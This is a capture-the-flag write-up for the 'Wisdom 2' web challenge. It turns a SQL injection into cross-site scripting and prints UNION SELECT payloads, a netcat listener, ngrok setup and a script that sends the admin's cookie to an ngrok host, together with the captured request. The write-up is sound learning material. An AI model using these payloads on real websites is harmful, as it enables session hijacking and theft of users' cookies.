Challenge
This is the continuation of Wisdom 1.
Solution
In Wisdom 1 we found a SQL injection in the website’s main page. Now let’s take a look at the second page.
The second page asks for a URL which the admin will take a look at :
If you have done CTFs before, you know that this is a classic XSS challenge, so we need to find a way to get a XSS on this website.
Taking another look back at the first page, I noticed that the query was sent through a GET request, meaning the query was in the URL:
After a little bit of googling I learnt that you can leverage a SQL injection into a RCE by adding PHP code inside your SELECT statement to add it to the page !
Sadly, the PHP code kept getting sanitized by the backend, even after trying all the weird sanitization evasion techniques I knew, but it was still worth to try to inject JavaScript instead:
' AND FALSE UNION SELECT "a", "<script>alert()</script>" FROM quotes; -- -
And it worked !
Finally, using ngrok, I could get the admin’s cookie which contained the flag:
nc -lnvp 8000
sudo ngrok http 8000
' AND FALSE UNION SELECT "a", "<script type='text/javascript'>document.location='https://a3ca-132-203-167-165.ngrok.io/?c='+document.cookie;</script>" FROM quotes; -- -
The final link looks like:
┌─[h3dg3h0g@parrotOS]─[~/Desktop/CTF/UnitedCTF2022/Wisdom 2]
└──╼ $nc -lnvp 8000
listening on [any] 8000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 35128
GET /?c=flag=FLAG-us3_http_0nly_c0ok13s_4nd_3nf0rc3_csp! HTTP/1.1
Host: 027f-74-57-165-14.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Referer: http://wisdom.ctf.unitedctf.ca/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 2600:1900:2000:a5::1a
X-Forwarded-Proto: https
This was a great web challenge, mainly because I learnt that you can leverage a SQLi into a RCE by injection PHP into the page. This wasn’t the point of this challenge, but still very cool chain of exploits !